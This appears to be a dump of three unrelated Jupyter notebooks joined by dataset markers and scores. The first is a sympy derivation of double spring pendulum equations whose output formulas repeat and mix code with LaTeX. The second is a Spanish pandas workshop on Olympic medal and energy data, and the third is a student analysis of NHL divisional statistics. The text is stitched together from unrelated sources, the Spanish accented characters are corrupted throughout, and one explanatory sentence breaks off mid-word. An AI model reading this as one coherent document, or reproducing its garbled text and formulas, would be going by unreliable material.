ddr0 = (2*(-6*m0*m1*(3*g*sin(theta1)-3*dtheta0^2*r0*sin(theta0-theta1)+6*dtheta0*dr0*cos(theta0-theta1)+4*dtheta1*dr1)*sin(theta0-theta1)-3*m1*(3*g*m0*sin(theta0)+6*g*m1*sin(theta0)+4*m0*dtheta0*dr0+12*m1*dtheta0*dr0+3*m1*dtheta1^2*r1*sin(theta0-theta1)+6*m1*dtheta1*dr1*cos(theta0-theta1))*sin(theta0-theta1)*cos(theta0-theta1)+(8*m0+6*m1)*(3*g*m1*cos(theta1)+6*k1*l1-6*k1*r1+3*m1*dtheta0^2*r0*cos(theta0-theta1)+6*m1*dtheta0*dr0*sin(theta0-theta1)+2*m1*dtheta1^2*r1)*cos(theta0-theta1)-(4*m0-12*m1*sin^2(theta0-theta1)-9*m1*cos^2(theta0-theta1)+12*m1)*(3*g*m0*cos(theta0)+6*g*m1*cos(theta0)+6*k0*l0-6*k0*r0+2*m0*dtheta0^2*r0+6*m1*dtheta0^2*r0+3*m1*dtheta1^2*r1*cos(theta0-theta1)-6*m1*dtheta1*dr1*sin(theta0-theta1))))/(3*m0*(-4*m0+2*m1*sin(theta0)*sin(theta1)*cos(theta0-theta1)+m1*cos^2(theta0)+m1*cos^2(theta1)-5*m1));
ddr1 = \frac{2*(3*m0*m1^2*(3 g\sin{(\theta1)}-3 dtheta0^2 r0\sin{(\theta0-\theta1)}+6 dtheta0 dr0\cos{(\theta0-\theta1)}+4 dtheta1 dr1)\sin{(\theta0-\theta1)}\cos{(\theta0-\theta1)}+6 m1 (m0+m1) (3 g m0\sin{(\theta0)}+6 g m1\sin{(\theta0)}+4 m0 dtheta0 dr0+12 m1 dtheta0 dr0+3 m1 dtheta1^2 r1\sin{(\theta0-\theta1)}+6 m1 dtheta1 dr1\cos{(\theta0-\theta1)})\sin{(\theta0-\theta1)}+2 m1 (4 m0+3 m1) (3 g m0\cos{(\theta0)}+6 g m1\cos{(\theta0)}+6 k0 l0-6 k0 r0+2 m0 dtheta0^2 r0+6 m1 dtheta0^2 r0+3 m1 dtheta1^2 r1\cos{(\theta0-\theta1)}-6 m1 dtheta1 dr1\sin{(\theta0-\theta1)})\cos{(\theta0-\theta1)}+(12 m1 (m0+3 m1)\sin^2{(\theta0-\theta1)}+9 m1 (m0+4 m1)\cos^2{(\theta0-\theta1)}-4 (m0+3 m1) (m0+4 m1)) (3 g m1\cos{(\theta1)}+6 k1 l1-6 k1 r1+3 m1 dtheta0^2 r0\cos{(\theta0-\theta1)}+6 m1 dtheta0 dr0\sin{(\theta0-\theta1)}+2 m1 dtheta1^2 r1))}{3 m0 m1 (-4 m0+2 m1\sin{(\theta0)}\sin{(\theta1)}\cos{(\theta0-\theta1)}+m1\cos^2{(\theta0)}+m1\cos^2{(\theta1)}-5 m1)};
ddtheta0 = \frac{-3 m0 m1 (3 g\sin{(\theta1)}-3 dtheta0^2 r0\sin{(\theta0-\theta1)}+6 dtheta0 dr0\cos{(\theta0-\theta1)}+4 dtheta1 dr1)\cos{(\theta0-\theta1)}+2 m1 (3 g m0\cos{(\theta0)}+6 g m1\cos{(\theta0)}+6 k0 l0-6 k0 r0+2 m0 dtheta0^2 r0+6 m1 dtheta0^2 r0+3 m1 dtheta1^2 r1\cos{(\theta0-\theta1)}-6 m1 dtheta1 dr1\sin{(\theta0-\theta1)})\sin{(\theta0-\theta1)}\cos{(\theta0-\theta1)}-4 (m0+m1) (3 g m1\cos{(\theta1)}+6 k1 l1-6 k1 r1+3 m1 dtheta0^2 r0\cos{(\theta0-\theta1)}+6 m1 dtheta0 dr0\sin{(\theta0-\theta1)}+2 m1 dtheta1^2 r1)\sin{(\theta0-\theta1)}+2 (m0-3 m1\sin^2{(\theta0-\theta1)}-4 m1\cos^2{(\theta0-\theta1)}+4 m1) (3 g m0\sin{(\theta0)}+6 g m1\sin{(\theta0)}+4 m0 dtheta0 dr0+12 m1 dtheta0 dr0+3 m1 dtheta1^2 r1\sin{(\theta0-\theta1)}+6 m1 dtheta1 dr1\cos{(\theta0-\theta1)})}{m0 (-4 m0+2 m1\sin{(\theta0)}\sin{(\theta1)}\cos{(\theta0-\theta1)}+m1\cos^2{(\theta0)}+m1\cos^2{(\theta1)}-5 m1) r0};
ddtheta1 = \frac{-3 m0 (3 g m0\sin{(\theta0)}+6 g m1\sin{(\theta0)}+4 m0 dtheta0 dr0+12 m1 dtheta0 dr0+3 m1 dtheta1^2 r1\sin{(\theta0-\theta1)}+6 m1 dtheta1 dr1\cos{(\theta0-\theta1)})\cos{(\theta0-\theta1)}-2 m0 (3 g m1\cos{(\theta1)}+6 k1 l1-6 k1 r1+3 m1 dtheta0^2 r0\cos{(\theta0-\theta1)}+6 m1 dtheta0 dr0\sin{(\theta0-\theta1)}+2 m1 dtheta1^2 r1)\sin{(\theta0-\theta1)}\cos{(\theta0-\theta1)}+4 m0 (3 g m0\cos{(\theta0)}+6 g m1\cos{(\theta0)}+6 k0 l0-6 k0 r0+2 m0 dtheta0^2 r0+6 m1 dtheta0^2 r0+3 m1 dtheta1^2 r1\cos{(\theta0-\theta1)}-6 m1 dtheta1 dr1\sin{(\theta0-\theta1)})\sin{(\theta0-\theta1)}-2 (4 m1 (m0+3 m1)\cos^2{(\theta0-\theta1)}+3 m1 (m0+4 m1)\sin^2{(\theta0-\theta1)}-(m0+3 m1) (m0+4 m1)) (3 g\sin{(\theta1)}-3 dtheta0^2 r0\sin{(\theta0-\theta1)}+6 dtheta0 dr0\cos{(\theta0-\theta1)}+4 dtheta1 dr1)}{m0 (-4 m0+2 m1\sin{(\theta0)}\sin{(\theta1)}\cos{(\theta0-\theta1)}+m1\cos^2{(\theta0)}+m1\cos^2{(\theta1)}-5 m1) r1};
```
|
github_jupyter
|
import sympy as sp
from sympy.physics.mechanics import dynamicsymbols
m0, m1, l0, l1, k0, k1, t, g = sp.symbols(r'm_0 m_1 l_0 l_1 k_0 k_1 t g')
theta0 = sp.Function(r'\theta_0')(t)
theta1 = sp.Function(r'\theta_1')(t)
r0 = sp.Function(r'r_0')(t)
r1 = sp.Function(r'r_1')(t)
dtheta0 = theta0.diff(t)
dtheta1 = theta1.diff(t)
dr0 = r0.diff(t)
dr1 = r1.diff(t)
I0 = m0 * r0 ** 2 / 12
I1 = m1 * r1 ** 2 / 12
x0 = (r0 / 2) * sp.sin(theta0)
y0 = -(r0 / 2) * sp.cos(theta0)
x1 = r0 * sp.sin(theta0) + (r1 / 2) * sp.sin(theta1)
y1 = -r0 * sp.cos(theta0) - (r1 / 2) * sp.cos(theta1)
spring_potential = k0 * (r0 - l0) ** 2 / 2 + k1 * (r1 - l1) ** 2 / 2
gravitational_potential = (m0 * y0 + m1 * y1) * g
kinetic = m0 * (x0.diff(t) ** 2 + y0.diff(t) ** 2) / 2 + m1 * (x1.diff(t) ** 2 + y1.diff(t) ** 2) / 2 + (I0 / 2) * theta0.diff(t) ** 2 + (I1 / 2) * theta1.diff(t) ** 2
L = kinetic - (spring_potential + gravitational_potential)
EL_r0 = sp.Eq(L.diff( dr0).diff(t),L.diff( r0)).simplify()
EL_r1 = sp.Eq(L.diff( dr1).diff(t),L.diff( r1)).simplify()
EL_theta0 = sp.Eq(L.diff(dtheta0).diff(t),L.diff(theta0)).simplify()
EL_theta1 = sp.Eq(L.diff(dtheta1).diff(t),L.diff(theta1)).simplify()
soln = sp.solve(
[EL_r0, EL_r1, EL_theta0, EL_theta1],
[r0.diff(t, 2), r1.diff(t, 2), theta0.diff(t, 2), theta1.diff(t, 2)]
)
keys = list(soln.keys())
soln_list = [sp.Eq(key,soln[key]) for key in keys]
ddr0 = soln_list[0].simplify()
ddr1 = soln_list[1].simplify()
ddtheta0 = soln_list[2].simplify()
ddtheta1 = soln_list[3].simplify()
subs_dict = {
r0.diff(t ):sp.Function( r'\dot{r}_0')(t),
r1.diff(t ):sp.Function( r'\dot{r}_1')(t),
theta0.diff(t ):sp.Function( r'\dot{\theta}_0')(t),
theta1.diff(t ):sp.Function( r'\dot{\theta}_1')(t),
r0.diff(t, 2):sp.Function( r'\ddot{r}_0')(t),
r1.diff(t, 2):sp.Function( r'\ddot{r}_1')(t),
theta0.diff(t, 2):sp.Function(r'\ddot{\theta}_0')(t),
theta1.diff(t, 2):sp.Function(r'\ddot{\theta}_1')(t)
}
def convert(_):
return str(_.subs(subs_dict).rhs).replace('(t)','').replace('\\left','').replace('\\right','').replace('\\theta','theta').replace('\\dot{theta}','dtheta').replace('\\dot{r}','dr').replace('_','').replace(' - ','-').replace(' + ','+')
convert(ddr0)
convert(ddr1)
convert(ddtheta0)
convert(ddtheta1)
ddr0 = (2*(-6*m0*m1*(3*g*sin(theta1)-3*dtheta0^2*r0*sin(theta0-theta1)+6*dtheta0*dr0*cos(theta0-theta1)+4*dtheta1*dr1)*sin(theta0-theta1)-3*m1*(3*g*m0*sin(theta0)+6*g*m1*sin(theta0)+4*m0*dtheta0*dr0+12*m1*dtheta0*dr0+3*m1*dtheta1^2*r1*sin(theta0-theta1)+6*m1*dtheta1*dr1*cos(theta0-theta1))*sin(theta0-theta1)*cos(theta0-theta1)+(8*m0+6*m1)*(3*g*m1*cos(theta1)+6*k1*l1-6*k1*r1+3*m1*dtheta0^2*r0*cos(theta0-theta1)+6*m1*dtheta0*dr0*sin(theta0-theta1)+2*m1*dtheta1^2*r1)*cos(theta0-theta1)-(4*m0-12*m1*sin^2(theta0-theta1)-9*m1*cos^2(theta0-theta1)+12*m1)*(3*g*m0*cos(theta0)+6*g*m1*cos(theta0)+6*k0*l0-6*k0*r0+2*m0*dtheta0^2*r0+6*m1*dtheta0^2*r0+3*m1*dtheta1^2*r1*cos(theta0-theta1)-6*m1*dtheta1*dr1*sin(theta0-theta1))))/(3*m0*(-4*m0+2*m1*sin(theta0)*sin(theta1)*cos(theta0-theta1)+m1*cos^2(theta0)+m1*cos^2(theta1)-5*m1));
ddr1 = \frac{2*(3*m0*m1^2*(3 g\sin{(\theta1)}-3 dtheta0^2 r0\sin{(\theta0-\theta1)}+6 dtheta0 dr0\cos{(\theta0-\theta1)}+4 dtheta1 dr1)\sin{(\theta0-\theta1)}\cos{(\theta0-\theta1)}+6 m1 (m0+m1) (3 g m0\sin{(\theta0)}+6 g m1\sin{(\theta0)}+4 m0 dtheta0 dr0+12 m1 dtheta0 dr0+3 m1 dtheta1^2 r1\sin{(\theta0-\theta1)}+6 m1 dtheta1 dr1\cos{(\theta0-\theta1)})\sin{(\theta0-\theta1)}+2 m1 (4 m0+3 m1) (3 g m0\cos{(\theta0)}+6 g m1\cos{(\theta0)}+6 k0 l0-6 k0 r0+2 m0 dtheta0^2 r0+6 m1 dtheta0^2 r0+3 m1 dtheta1^2 r1\cos{(\theta0-\theta1)}-6 m1 dtheta1 dr1\sin{(\theta0-\theta1)})\cos{(\theta0-\theta1)}+(12 m1 (m0+3 m1)\sin^2{(\theta0-\theta1)}+9 m1 (m0+4 m1)\cos^2{(\theta0-\theta1)}-4 (m0+3 m1) (m0+4 m1)) (3 g m1\cos{(\theta1)}+6 k1 l1-6 k1 r1+3 m1 dtheta0^2 r0\cos{(\theta0-\theta1)}+6 m1 dtheta0 dr0\sin{(\theta0-\theta1)}+2 m1 dtheta1^2 r1))}{3 m0 m1 (-4 m0+2 m1\sin{(\theta0)}\sin{(\theta1)}\cos{(\theta0-\theta1)}+m1\cos^2{(\theta0)}+m1\cos^2{(\theta1)}-5 m1)};
ddtheta0 = \frac{-3 m0 m1 (3 g\sin{(\theta1)}-3 dtheta0^2 r0\sin{(\theta0-\theta1)}+6 dtheta0 dr0\cos{(\theta0-\theta1)}+4 dtheta1 dr1)\cos{(\theta0-\theta1)}+2 m1 (3 g m0\cos{(\theta0)}+6 g m1\cos{(\theta0)}+6 k0 l0-6 k0 r0+2 m0 dtheta0^2 r0+6 m1 dtheta0^2 r0+3 m1 dtheta1^2 r1\cos{(\theta0-\theta1)}-6 m1 dtheta1 dr1\sin{(\theta0-\theta1)})\sin{(\theta0-\theta1)}\cos{(\theta0-\theta1)}-4 (m0+m1) (3 g m1\cos{(\theta1)}+6 k1 l1-6 k1 r1+3 m1 dtheta0^2 r0\cos{(\theta0-\theta1)}+6 m1 dtheta0 dr0\sin{(\theta0-\theta1)}+2 m1 dtheta1^2 r1)\sin{(\theta0-\theta1)}+2 (m0-3 m1\sin^2{(\theta0-\theta1)}-4 m1\cos^2{(\theta0-\theta1)}+4 m1) (3 g m0\sin{(\theta0)}+6 g m1\sin{(\theta0)}+4 m0 dtheta0 dr0+12 m1 dtheta0 dr0+3 m1 dtheta1^2 r1\sin{(\theta0-\theta1)}+6 m1 dtheta1 dr1\cos{(\theta0-\theta1)})}{m0 (-4 m0+2 m1\sin{(\theta0)}\sin{(\theta1)}\cos{(\theta0-\theta1)}+m1\cos^2{(\theta0)}+m1\cos^2{(\theta1)}-5 m1) r0};
ddtheta1 = \frac{-3 m0 (3 g m0\sin{(\theta0)}+6 g m1\sin{(\theta0)}+4 m0 dtheta0 dr0+12 m1 dtheta0 dr0+3 m1 dtheta1^2 r1\sin{(\theta0-\theta1)}+6 m1 dtheta1 dr1\cos{(\theta0-\theta1)})\cos{(\theta0-\theta1)}-2 m0 (3 g m1\cos{(\theta1)}+6 k1 l1-6 k1 r1+3 m1 dtheta0^2 r0\cos{(\theta0-\theta1)}+6 m1 dtheta0 dr0\sin{(\theta0-\theta1)}+2 m1 dtheta1^2 r1)\sin{(\theta0-\theta1)}\cos{(\theta0-\theta1)}+4 m0 (3 g m0\cos{(\theta0)}+6 g m1\cos{(\theta0)}+6 k0 l0-6 k0 r0+2 m0 dtheta0^2 r0+6 m1 dtheta0^2 r0+3 m1 dtheta1^2 r1\cos{(\theta0-\theta1)}-6 m1 dtheta1 dr1\sin{(\theta0-\theta1)})\sin{(\theta0-\theta1)}-2 (4 m1 (m0+3 m1)\cos^2{(\theta0-\theta1)}+3 m1 (m0+4 m1)\sin^2{(\theta0-\theta1)}-(m0+3 m1) (m0+4 m1)) (3 g\sin{(\theta1)}-3 dtheta0^2 r0\sin{(\theta0-\theta1)}+6 dtheta0 dr0\cos{(\theta0-\theta1)}+4 dtheta1 dr1)}{m0 (-4 m0+2 m1\sin{(\theta0)}\sin{(\theta1)}\cos{(\theta0-\theta1)}+m1\cos^2{(\theta0)}+m1\cos^2{(\theta1)}-5 m1) r1};
| 0.409929 | 0.847337 |
# Taller Pandas
Para el siguiente taller se trabajaran con los archivos mencionados en cada ejercicio. Asegurarse de tenerlos en la misma carpeta que este documento.
Taller basado en el curso __Introduction to Data Science in Python__ de la universidad de Michigan.
## Parte 1
Importe el archivo olympics.csv. Asegurese que quede en el formato adecuado.
### Pregunta 1
Cual pais ha ganado mas medallas de oro en los juegos de verano?
### Pregunta 2
Cual pais tiene la diferencia mas grande entre la cantidad de medallas de oro obtenidas en verano e invierno?
### Pregunta 3
ยฟQuรฉ paรญs tiene la mayor diferencia entre el recuento de medallas de oro de verano y el recuento de medallas de oro de invierno en relaciรณn con el recuento total de medallas de oro?
$$\frac{Summer~Gold - Winter~Gold}{Total~Gold}$$
Solo incluye paรญses que hayan ganado al menos 1 oro tanto en verano como en invierno.
### Pregunta 4
Escribe una funciรณn que cree una serie llamada "Puntos", que es un valor ponderado donde cada medalla de oro (`Gold.2`) cuenta 3 puntos, medallas de plata (` Silver.2`) 2 puntos y medallas de bronce (` Bronce.2`) por 1 punto. La funciรณn debe devolver solo la columna (un objeto Serie) que creรณ, con los nombres de los paรญses como รญndices.
* Esta funciรณn deberรญa devolver una serie denominada `Puntos` de longitud 146 *
## Parte 2
### Pregunta 1
Cargue los datos de energรญa del archivo Energy Indicators.xls, que es una lista de indicadores de suministro de energรญa y producciรณn de electricidad renovable de las Naciones Unidas para el aรฑo 2013, y debe colocarse en un DataFrame con el nombre de la variable energรญa.
Tenga en cuenta que este es un archivo de Excel y no un archivo de valores separados por comas. Ademรกs, asegรบrese de excluir la informaciรณn del encabezado y el pie de pรกgina del archivo de datos. Las dos primeras columnas son innecesarias, por lo que debe deshacerse de ellas y debe cambiar las etiquetas de las columnas para que las columnas sean:
['Paรญs', 'Suministro de energรญa', 'Suministro de energรญa per cรกpita', '% renovable']
Convierta el suministro de energรญa en gigajulios (hay 1,000,000 gigajulios en un petajulio). Para todos los paรญses que tienen datos faltantes (por ejemplo, datos con "...") asegรบrese de que esto se refleje como valores np.NaN.
Cambie el nombre de la siguiente lista de paรญses (para usar en preguntas posteriores):
"Repรบblica de Corea": "Corea del Sur",
"Estados Unidos de Amรฉrica": "Estados Unidos",
"Reino Unido de Gran Bretaรฑa e Irlanda del Norte": "Reino Unido",
"China, Regiรณn Administrativa Especial de Hong Kong": "Hong Kong"
Tambiรฉn hay varios paรญses con nรบmeros y / o parรฉntesis en su nombre. Asegรบrese de eliminar estos,
p.ej.
'Bolivia (Estado Plurinacional de)' deberรญa ser 'Bolivia',
'Suiza17' deberรญa ser 'Suiza'.
A continuaciรณn, cargue los datos del PIB del archivo world_bank.csv, que es un csv que contiene el PIB de los paรญses de 1960 a 2015 del Banco Mundial. Llame a este DataFrame GDP.
Asegรบrese de omitir el encabezado y cambie el nombre de la siguiente lista de paรญses:
"Repรบblica de Corea": "Corea del Sur",
"Irรกn, Repรบblica Islรกmica": "Irรกn",
"RAE de Hong Kong, China": "Hong Kong"
Finalmente, cargue los datos de Sciamgo Journal y Country Rank para Energy Engineering y Power Technology del archivo scimagojr-3.xlsx, que clasifica los paรญses segรบn sus contribuciones a revistas en el รกrea mencionada anteriormente. Llame a este DataFrame ScimEn.
รnase a los tres conjuntos de datos: PIB, Energรญa y ScimEn en un nuevo conjunto de datos (utilizando la intersecciรณn de los nombres de los paรญses). Utilice solo los datos del PIB de los รบltimos 10 aรฑos (2006-2015) y solo los 15 paรญses principales segรบn el 'Rango' de Scimagojr (Rango 1 a 15).
El รญndice de este DataFrame debe ser el nombre del paรญs y las columnas deben ser
['Clasificaciรณn', 'Documentos', 'Documentos citables', 'Citas', 'Autocitas', 'Citas por documento', 'H รญndice ',' Suministro de energรญa ',' Suministro de energรญa per cรกpita ','% Renovable ',' 2006 ',' 2007 ',' 2008 ',' 2009 ',' 2010 ',' 2011 ',' 2012 ',' 2013 ',' 2014 ',' 2015 '].
```
pd.read_('')
```
### Pregunta 2
La pregunta anterior uniรณ tres conjuntos de datos y luego redujo esto a solo las 15 entradas principales. Cuando se uniรณ a los conjuntos de datos, pero antes de reducir esto a los 15 elementos principales, ยฟcuรกntas entradas perdiรณ?
### Pregunta 3
ยฟCuรกl es el PIB promedio de los รบltimos 10 aรฑos para cada paรญs? (excluya los valores faltantes de este cรกlculo).
|
github_jupyter
|
pd.read_('')
| 0.060014 | 0.879923 |
# Kyle Burt
## 4 New NHL Divisions Due to Covid-19 and Their Performance
The NHL was forced to created 4 divisions to geographically split up the teams. The North division comprised of all the Canadian teams was seen as the โweakestโ division. I want to put this to the test, I will do this through comparing the North Divisions stats described below, and the other three American divisions seen as the โstrongerโ divisions. his will be able to provide clarity on if Covid-19 divisions affect outcomes of the NHL.e.
- See if the North Divisions stats were lower or higher than the rest of the divisions to see if they were 'weak'.
# Milestone 3
```
import pandas as pd
data = pd.read_csv("../data/raw/Games - Natural Stat TrickTeam Season Totals - Natural Stat Trick.csv")
data
```
## Task 1: Conduct a EDA
```
import numpy as np
import matplotlib.pylab as plt
import seaborn as sns
print(f"There are {data.shape} rows and columns in the data")
print(f"The columns in the data set are: {data.columns}")
data.describe().T
data.describe(include = 'object').T
hist= data.hist(bins=10, figsize=(10,10))
boxplot = data.boxplot(grid=False, vert=False,fontsize=15)
plt.figure(figsize=(14,12))
sns.heatmap(data.corr(),linewidths=.1,cmap="YlGnBu", annot=True)
plt.yticks(rotation=0);
```
## Task 2: Analysis Pipeline
```
df = data.drop(columns = ['CF', 'CA' , 'SCF' , 'SCA' , 'Unnamed: 2'])
df
```
##
- I have decided to drop the columns of CF,CA,SCF,SCA, and Unnamed: 2 as many of our stats are combined to produce a percentage, which will be more useful.
- I have ran a quick value count to make sure that I had the correct teams in the division and that they each played 56 regular season games. (31 teams x 56 games = 1736 games)
- I later decided to drop the team names and add a new column of the division name so I can compare data based on divisional play and not team play as it is not useful for my research question.
# North Division
```
northdiv1 = df.drop(data[data.Team.isin([ "Arizona Coyotes", "Buffalo Sabres", "Boston Bruins", "Carolina Hurricanes", "Columbus Blue Jackets",
"Chicago Blackhawks", "Colorado Avalanche", "Dallas Stars", "Detroit Red Wings", "Florida Panthers",
"Los Angeles Kings", "Minnesota Wild", "Nashville Predators", "Pittsburgh Penguins", "San Jose Sharks", "Tampa Bay Lightning",
"St Louis Blues", "Vegas Golden Knights", "New Jersey Devils", "New York Islanders", "New York Rangers", "Philadelphia Flyers",
"Washington Capitals", "Anaheim Ducks"])].index)
northdiv = northdiv1.reset_index()
print(northdiv['Team'].value_counts())
northdiv = northdiv.drop(columns = ['Team', 'index'])
northdiv['Division']='North'
```
## Steps for North Division
- Dropped all teams that were not in the North division (Calgary, Edmonton, Montreal, Toronto, Winnipeg, Ottawa, Vancouver).
- Reset the index and ran a value count on 'Team' to make sure that the correct teams were in the division I have created and they each played 56 games.
- Dropped the columns team and index as I am looking at the division not each team in a division.
- Added a new column 'Division' equal to North to be able to use just the North stats.
# East Division
```
eastdiv1 = df.drop(data[data.Team.isin(["Arizona Coyotes", "Carolina Hurricanes", "Columbus Blue Jackets", "Calgary Flames", "Chicago Blackhawks", "Colorado Avalanche",
"Dallas Stars", "Detroit Red Wings", "Florida Panthers", "Los Angeles Kings", "Minnesota Wild", "Nashville Predators", "San Jose Sharks",
"Tampa Bay Lightning", "St Louis Blues", "Vegas Golden Knights", "Edmonton Oilers", "Montreal Canadiens","Ottawa Senators",
"Toronto Maple Leafs", "Winnipeg Jets", "Anaheim Ducks", "Vancouver Canucks",])].index)
eastdiv = eastdiv1.reset_index()
print(eastdiv['Team'].value_counts())
eastdiv = eastdiv.drop(columns = ['Team', 'index'])
eastdiv['Division']='East'
```
## Steps for East Division
- Dropped all teams that were not in the East division (Pittsburgh, Washington, Boston, NY Islanders, NY Rangers, Philadelphia, New Jersey, Buffalo).
- Reset the index and ran a value count on 'Team' to make sure that the correct teams were in the division I have created and they each played 56 games.
- Dropped the columns team and index as I am looking at the division not each team in a division.
- Added a new column 'Division' equal to East to be able to use just the East stats.
# Central Division
```
centdiv1 = df.drop(data[data.Team.isin(["Arizona Coyotes", "Buffalo Sabres", "Boston Bruins", "Calgary Flames","Colorado Avalanche"
,"Los Angeles Kings", "Minnesota Wild","Pittsburgh Penguins", "San Jose Sharks", "St Louis Blues", "Vegas Golden Knights",
"Edmonton Oilers", "Montreal Canadiens", "New Jersey Devils", "New York Islanders",
"New York Rangers", "Ottawa Senators", "Philadelphia Flyers", "Toronto Maple Leafs",
"Winnipeg Jets", "Washington Capitals", "Anaheim Ducks", "Vancouver Canucks"])].index)
centdiv = centdiv1.reset_index()
print(centdiv['Team'].value_counts())
centdiv = centdiv.drop(columns = ['Team', 'index'])
centdiv['Division']='Central'
```
## Steps for Central Division
- Dropped all teams that were not in the Central division (Carolina, Florida, Tampa Bay, Nashville, Dallas, Chicago, Detroit, Columbus).
- Reset the index and ran a value count on 'Team' to make sure that the correct teams were in the division I have created and they each played 56 games.
- Dropped the columns team and index as I am looking at the division not each team in a division.
- Added a new column 'Division' equal to Central to be able to use just the Central stats.
# West Division
```
westdiv1= df.drop(data[data.Team.isin(["Buffalo Sabres", "Boston Bruins", "Carolina Hurricanes",
"Columbus Blue Jackets", "Calgary Flames", "Chicago Blackhawks", "Dallas Stars", "Detroit Red Wings", "Florida Panthers",
"Nashville Predators", "Pittsburgh Penguins","Tampa Bay Lightning","Edmonton Oilers", "Montreal Canadiens",
"New Jersey Devils", "New York Islanders", "New York Rangers", "Ottawa Senators",
"Philadelphia Flyers", "Toronto Maple Leafs", "Winnipeg Jets", "Washington Capitals","Vancouver Canucks"])].index)
westdiv= westdiv1.reset_index()
print(westdiv['Team'].value_counts())
westdiv= westdiv.drop(columns = ['Team','index'])
westdiv['Division']='West'
```
## Steps for West Division
- Dropped all teams that were not in the West division (Colorado, Vegas, Minnesota, St. Louis, Arizona, Los Angeles, San Jose, Anaheim).
- Reset the index and ran a value count on 'Team' to make sure that the correct teams were in the division I have created and they each played 56 games.
- Dropped the columns team and index as I am looking at the division not each team in a division.
- Added a new column 'Division' equal to West to be able to use just the West stats.
# All Divisons (concatting all cleaned divisions into one)
```
data_frames = [northdiv, centdiv, eastdiv, westdiv]
alldivisions = pd.concat([northdiv, centdiv, eastdiv,westdiv], axis=0)
alldivisions
```
# Task 3 Method Chaining and Python Programs
```
import project_functions2 as kp
dfp= kp.load_and_process(path_to_csv_file = "../data/raw/Games - Natural Stat TrickTeam Season Totals - Natural Stat Trick.csv")
dfp
NorthDiv = kp.North_Div1(dfp)
CentDiv = kp.Cent_Div1(dfp)
WestDiv = kp.West_Div1(dfp)
EastDiv = kp.East_Div1(dfp)
AllDiv = kp.all_divisions_describe(dfp)
```
# Task 4
## Data Analysis:
```
print("Number of rows and columns respectively:", dfp.shape)
print("Columns in the dataset:", dfp.columns)
kp.all_divisions_describe(dfp)
```
# Divisional Corsi (CF%)
```
df = kp.all_divisions_describe(dfp)
(sns.violinplot(x="CF%", y="Division", data=df)).set_title("Divisions Corsi %")
```
# Results:
## Corsi % (CF%) for a team takes the number of shot attempts by the team and divides it by the number of shot attempts by its opponent. This accounts for shots on goal, missed shots, blocked shots over the shots against, missed shots against and blocked shots against. This is a great stat for a teams puck possession, which can predict future success as well as who is dominating the game. A average co
- The means are all so identcially close but when we look at the shape the north division stands out.
- All other divisions have a normal looking distribution with similar outliers. We see by their normal shape that they had a higher probability of getting a corsi % of around 50 and a lower probability of getting one lower than 50. all other divisions have a normal looking distribution with similar outliers. We see by their normal shape that they had a higher probability of getting a corsi % of around 50 and a lower probability of getting one lower/greater than 50.
- North division has a greater range with more outliers having some very high CF% and some very low CF%. By the shape of their distribution it is not normal, it peaks and then flattens out and is almost constant between a Corsi % of 40 and 60. This shows that there probability of getting a CF% was almost identical between these values. This is helpful as it shows that the North division was inconsistent, some games they were playing great with Corsi% around 55-60%, but other games they had no control of the game with Corsi% between 40-45%. Just shown by the shape we can see that it isn't a major skew in the data between divisions but hockey is a game of split second decisions and the North division was struggling to play consistent.
# Divisional Scoring Chances For Percentage (SCF%)
```
sns.set(style="darkgrid")
df = kp.North_Div1(dfp)
df1 = kp.West_Div1(dfp)
df2 = kp.East_Div1(dfp)
df3 = kp.Cent_Div1(dfp)
# Maybe dont do a histogram as it is confusing with all of the bars.
sns.histplot(data=df, x="SCF%", color="red", label="North Div", kde=True)
sns.histplot(data=df1, x="SCF%", color="green", label="West Div", kde=True)
sns.histplot(data=df2, x="SCF%", color="blue", label="East Div", kde=True)
sns.histplot(data=df3, x="SCF%", color="yellow", label="Central Div", kde=True)
plt.title('Divisions SCF%')
plt.legend()
plt.show()
```
# Results:
## Scoring Chances For Percentage (SCF%) is the number of real scoring chances a team has over the course of the game. This will take Corsi events and subtracts any shot from outside a teamโs offensive zone.
- From the histogram comparing all divisions SCF% we can see a few interesting things. First we can see that the North division (Red) and the Central Divisions (Yellow) both has a dip when their SCF% was around 50 and peaked when around 40% and 60%, not only are they the lowest on the graph which means they had less games with a SCF% around 50% but they were a drastically gap between the other divisions with a normal distribution. This shows That when comparing the North division to the other three divisions, they were once again inconsistent. They had games with many scoring chances, but they also had games with a relative low scoring chance. This helps show that the north division was incoherent when playing agaisnt eachother night after night . When we look at the East division (Blue) we can see that in their divisional play all the teams were more consistent when playing against eachother. having the highest frequency around 50%.
# Divisional Save Percentage (SV%)
```
df4 = kp.North_Div1(dfp)
df5 = kp.West_Div1(dfp)
df6 = kp.East_Div1(dfp)
df7 = kp.Cent_Div1(dfp)
sns.kdeplot(data=df4, x="SV%", color = "orange", label="North Div", common_norm=False, alpha=0.9)
sns.kdeplot(data=df5, x="SV%", color = "green", label="West Div", common_norm=False, alpha=0.9)
sns.kdeplot(data=df6, x="SV%", color = "red",label="East Div",common_norm=False, alpha=0.9)
sns.kdeplot(data=df7, x="SV%", color = "blue" ,label="Central Div", common_norm=False, alpha=0.9)
plt.title('Divisions Save Percentage')
plt.legend()
plt.show()
```
# Results:
## Save Percentage (SV%) helps determine a teams defense and goaltending by analyzing the number of shots on goal a goaltender saves.
- From the density plot above we can see that the all the divisions had data skewed to the left which is good as you want your team to have a save percentage as close to 100%, thus letting in 0 goals. The North Division has some of the worst save percentage as they were peaking around the 90% mark, yet all other divisions were peaking around the mid 90's. The North division also has a lower probability of achieving this save %. The Central divison had the best goaltending as their probabaility of having a SV% above 90% was high; This also shows the same effect with the West and East divisions just with a slightly less high probability. Thus, the North division goaltending was struggling compared to other divsions, showing that they were sloppy in the defensive zone but also were saving less shots than the other divisions.
# Divisional Time on Ice (TOI)
```
df1 = kp.all_divisions_describe(dfp)
sns.set_theme(style="white", rc={"axes.facecolor": (0, 0, 0, 0), 'axes.linewidth':2})
palette = sns.color_palette("Set2", 12)
g = sns.FacetGrid(df1, palette=palette, row="Division",hue = "Division", aspect=9, height=1.2)
g.map_dataframe(sns.kdeplot, x="TOI", fill=True, alpha=1)
g.map_dataframe(sns.kdeplot, x="TOI", color='black')
def label(x, color, label):
ax = plt.gca()
ax.text(0, .2, label, color='Black', fontsize=13,
ha="left", va="center", transform=ax.transAxes)
g.map(label, "Division")
g.fig.subplots_adjust(hspace=-.5)
g.set_titles("")
g.set(yticks=[], xlabel="Minutes ")
g.despine( left=True)
plt.suptitle('NHL Divisions - TOI', y=0.98)
```
# Results:
## Time on Ice (TOI) is a divisions total time on ice for 5v5, regular strength play. This is able to determine how disiplined a division was overal staying out of the penalty box.
